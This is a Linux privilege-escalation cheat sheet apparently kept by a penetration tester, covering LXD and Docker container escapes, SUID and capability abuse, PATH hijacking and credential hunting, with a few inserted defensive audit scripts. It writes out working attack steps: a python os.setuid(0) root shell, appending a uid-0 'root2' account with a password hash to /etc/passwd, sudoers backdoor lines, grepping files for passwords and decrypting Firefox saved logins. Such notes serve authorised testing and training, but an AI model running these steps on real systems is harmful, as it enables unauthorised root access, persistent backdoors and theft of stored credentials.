M4RCG04M

Linux

Bash History

cat .bash_history

ID

Check the current user and its groups with id; some group memberships are vulnerable by themselves:

USERS

Enumerate the users and try to access their home directories.

ls /home

LXD

If lxc/lxd is not working, USE THE FULL PATH of the binary.

First download an Alpine image, then upload it to the remote machine.

git clone https://github.com/saghul/lxd-alpine-builder.git
cd lxd-alpine-builder/
./build-alpine

A compressed file will be created. Now we have to send this file to the victim machine.

Once the file is copied, initialize LXD on the remote machine, answering "no" to all prompts. The following command does this non-interactively:

sudo lxd init --auto

Next, we run the following command to import the alpine image.

lxc image import <zip_file> --alias <name>

To check if the image is successfully imported, type the following.

lxc image list

Next, we need to make the container privileged, and mount the filesystem, before starting the container.

lxc init <name> mycontainer -c security.privileged=true
lxc config device add mycontainer mydevice disk source=/ path=/mnt/root recursive=true
lxc start mycontainer

Once the container is started, we can access it by typing the following command.

lxc exec mycontainer /bin/sh
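The LXD route above works because membership of the lxd group is effectively root; the defensive counterpart is knowing who holds that membership. The following is an added example, not from these notes: a POSIX sh function that lists members of the given groups from a group file, including users whose primary GID is that group and who therefore never appear in the /etc/group member list. File paths and group names are parameters, and the sample data used to exercise it is constructed.

```sh
#!/bin/sh
# Added example (not part of the original notes): list members of sensitive
# groups such as lxd, the membership that makes the container escape possible.
# Usage: sensitive_group_members /etc/group /etc/passwd lxd [group...]
sensitive_group_members() {
    _groupfile=$1
    _passwdfile=$2
    shift 2
    for _g in "$@"; do
        awk -F: -v g="$_g" -v passwd="$_passwdfile" '
        $1 == g {
            gid = $3
            # supplementary members are listed in field 4, comma separated
            n = split($4, members, ",")
            for (i = 1; i <= n; i++)
                if (members[i] != "") seen[members[i]] = 1
            # users whose primary group is g are only visible in passwd
            while ((getline line < passwd) > 0) {
                split(line, f, ":")
                if (f[1] != "" && f[4] == gid) seen[f[1]] = 1
            }
            close(passwd)
            for (u in seen) print g, u
        }' "$_groupfile"
    done | sort
}

# Live usage on a host: sensitive_group_members /etc/group /etc/passwd lxd
```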

Sudoers

sudo -l

Files belonging the user

find / \( -user user -o -group user \) 2>/dev/null

SUID Privileges

We have to look for binaries with the SUID bit set. They run with the privileges of their owner, which is critical when the owner is root.

find / -user root -perm -4000 -print 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
find / -user root -perm -4000 -exec ls -ldb {} \;

Once we find one go to https://gtfobins.github.io/.

Cron Jobs


Abuse of incorrectly implemented permissions

We look for files that allow writing:

find / -writable 2>/dev/null

The following command looks for writable files only (excluding symlinks, etc.):

find / -not -type l -perm -o+w

Abusing Password Authentication

openssl passwd <PASSWORD>
echo "root2:FgKl.eqJO6s2g:0:0:root:/root:/bin/bash" >> /etc/passwd
su root2

Add users to /etc/sudoers

user ALL=(ALL:ALL) ALL 

Detection and Exploitation of Capabilities

getcap -r / 2>/dev/null

Capabilities that can lead to privilege escalation

cap_dac_read_search

Allows us to read any file from the system

cap_setuid

Allows us to change the uid of the process

/usr/bin/python3.8 = cap_setuid,cap_net_bind_service+eip

With this capability on python 3.8 we can write a python file that changes our uid and opens a shell:

import os
os.setuid(0)  # Switch to root user
os.system('/bin/bash')  # Spawn a root shell
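Reviewing the raw getcap -r output by eye does not scale, so here is an added example (not from these notes) that filters it for the capabilities discussed above. It reads getcap-style lines on stdin, handles both the older "path = caps+flags" and the newer "path caps=flags" output formats, and prints only the path and capability pairs that match the list in RISKY_CAPS (assumed name; defaults to cap_setuid and cap_dac_read_search). The sample lines used to exercise it are constructed.

```sh
#!/bin/sh
# Added example (not part of the original notes): filter getcap -r output for
# capabilities that let a binary change identity or bypass file permissions.
# Reads getcap lines on stdin; the default list covers the two capabilities
# discussed above and can be overridden via RISKY_CAPS (space separated).
risky_caps() {
    awk -v risky="${RISKY_CAPS:-cap_setuid cap_dac_read_search}" '
    BEGIN {
        n = split(risky, r, " ")
        for (i = 1; i <= n; i++) want[r[i]] = 1
    }
    NF >= 2 {
        # getcap prints either "path = caps+flags" (older libcap)
        # or "path caps=flags" (newer libcap); the path is the first field
        # and the capability spec is always the last one (paths with spaces
        # are not handled).
        path = $1
        spec = $NF
        sub(/[+=].*$/, "", spec)          # strip the +eip / =ep flag suffix
        m = split(spec, caps, ",")
        for (j = 1; j <= m; j++)
            if (caps[j] in want) print path, caps[j]
    }'
}

# Live usage on a host: getcap -r / 2>/dev/null | risky_caps
```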

Kernel Exploitation

To see the Linux distribution and the kernel version, run:

lsb_release -a
uname -a

Locally Stored Credentials

Search for credentials by trying various options like username, password, db_username, db_password, db_user etc.

grep -nr "username"
grep -nr "password"

Mozilla Firefox files

ls -l .mozilla
ls -l .mozilla/firefox/
ls -l .mozilla/firefox/sj1c9rus.default
ls -l .mozilla/firefox/sj1c9rus.default/key4.db
ls -l .mozilla/firefox/sj1c9rus.default/logins.json

We can decrypt the protected passwords using firepwd:

python firepwd.py -d /root/

Enumerate local ports

netstat -tnlp
netstat -na -p tcp

If we detect ports that we did not see in the initial scan, we should forward them to our machine and check what is listening.

motd.legal-displayed

If you find this file, there is an exploit for privesc: https://www.exploit-db.com/exploits/14339

Path Hijacking

$PATH is an environment variable that tells the system where to look for executables when you run a command without specifying its full path.

echo $PATH

Example output:

/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games

Each directory is separated by :. The system searches these directories from left to right when executing commands.

Look for external commands invoked without absolute paths, for example a script that uses tar instead of /usr/bin/tar.

Modifying $PATH

You can add new directories at the beginning of $PATH to prioritize them:

export PATH="/tmp:$PATH"

Now, if an executable called tar exists in /tmp, it will run before the system's default tar.
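The hijack described above needs two things at once: a directory early in $PATH that an unprivileged user can write to (or create), and a script or cron job that calls a command by bare name. The following added example, not from these notes, reports both conditions in POSIX sh; function names are assumed, and the script used to exercise it is constructed.

```sh
#!/bin/sh
# Added example (not part of the original notes): report the two conditions
# that make a $PATH hijack possible. Nothing here modifies PATH or any file.

# writable_path_dirs PATHSTRING
# Prints WRITABLE <dir> for entries the current user can write to and
# MISSING <dir> for entries that do not exist (and so could be created).
writable_path_dirs() {
    _saved_ifs=$IFS
    IFS=:
    for _dir in $1; do
        # an empty entry means "the current directory", a classic weak spot
        [ -z "$_dir" ] && _dir=.
        if [ ! -e "$_dir" ]; then
            printf 'MISSING %s\n' "$_dir"
        elif [ -w "$_dir" ]; then
            printf 'WRITABLE %s\n' "$_dir"
        fi
    done
    IFS=$_saved_ifs
}

# unqualified_commands SCRIPT CMD...
# Prints each CMD that SCRIPT invokes by bare name (e.g. "tar") rather than
# by absolute path (e.g. "/usr/bin/tar"); those calls resolve through $PATH.
unqualified_commands() {
    _script=$1
    shift
    for _cmd in "$@"; do
        # the name must start a command: line start or after whitespace ; | & (
        # and must not be preceded by a slash (that would be a full path)
        if grep -Eq "(^|[[:space:];|&(])$_cmd([[:space:]]|\$)" "$_script"; then
            printf '%s\n' "$_cmd"
        fi
    done
}

# Live usage: writable_path_dirs "$PATH"; unqualified_commands backup.sh tar gzip
```

Note that when run as root every directory reports as WRITABLE, so run the PATH check as the unprivileged account that executes the script.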

Docker Escape

Enumerate the disks available

findmnt
lsblk
fdisk -l

Mount a folder with the disk contents

mkdir -p /mnt/tmp
mount /dev/xvda1 /mnt/tmp

Next, we access the folder with the data.


We can use linux-smart-enumeration. Otherwise we can use a tool that detects methods to escalate privileges, such as the linux exploit suggester tool.